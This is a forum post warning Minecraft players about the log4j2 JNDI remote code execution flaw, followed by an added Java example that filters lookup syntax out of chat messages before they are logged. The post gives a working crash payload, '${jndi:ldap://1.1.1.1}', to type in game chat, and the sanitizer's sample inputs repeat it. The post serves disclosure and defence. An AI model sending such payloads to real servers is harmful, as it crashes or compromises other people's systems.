Massive Remote Code Execution vulnerability
Anyone connected to a server can execute code on its players' machines, and even on the server itself!
To make this quick, the log4j2 library (which Minecraft uses) has a massive vulnerability in that it trusts LDAP servers outside of the local network - downloading Java classes and executing them. Source: https://github.com/apache/logging-log4j2/pull/608
The simplest test that can be done is crashing ANY unpatched Minecraft server by typing the following text in the game chat: ${jndi:ldap://1.1.1.1}. The game will try to load a class from 1.1.1.1, but as it's a DNS server (thus invalid for LDAP), it will just crash.
https://media.discordapp.net/attachments/754673481987129394/918673980519501844/unknown.png
Multiple modding frameworks released patches today, doing input validation before logging chat messages.
2021-12-10, 01:41 AM
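A sketch of the kind of chat-message validation before logging that the post mentions, as an added example that is not part of the original post and is not taken from any modding framework's patch. The class, method and field names are hypothetical, and the sample messages are constructed (the lookup string is the one quoted in the post).

```java
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Added example (hypothetical names): validate chat text before it reaches the logger. */
public final class ChatLogSanitizer {

    // Log4j lookups open with "${". Matching the opener instead of the word
    // "jndi" also covers nested or differently named lookups.
    private static final Pattern LOOKUP_OPEN = Pattern.compile("\\$\\{");

    /** Outcome of validating one chat message. */
    public static final class Result {
        public final boolean suspicious; // true if lookup syntax was present
        public final String safeText;    // text that is safe to hand to the logger

        Result(boolean suspicious, String safeText) {
            this.suspicious = suspicious;
            this.safeText = safeText;
        }
    }

    public static Result validate(String message) {
        if (message == null) {
            return new Result(false, "");
        }
        Matcher m = LOOKUP_OPEN.matcher(message);
        if (!m.find()) {
            return new Result(false, message);
        }
        // Break every "${" so the logged text is no longer lookup syntax.
        String safe = m.replaceAll(Matcher.quoteReplacement("$ {"));
        return new Result(true, safe);
    }

    public static void main(String[] args) {
        // Constructed sample chat lines.
        List<String> samples = List.of(
                "hello world",
                "${jndi:ldap://1.1.1.1}",
                "selling diamonds for $5 {cheap}");
        for (String chat : samples) {
            Result r = validate(chat);
            // A server would log r.safeText here and could drop or flag the message.
            System.out.println((r.suspicious ? "FLAGGED " : "ok      ") + r.safeText);
        }
    }
}
```

Filtering of this kind only reduces exposure at the chat entry point; any other player-controlled string that gets logged needs the same treatment until the library itself is patched.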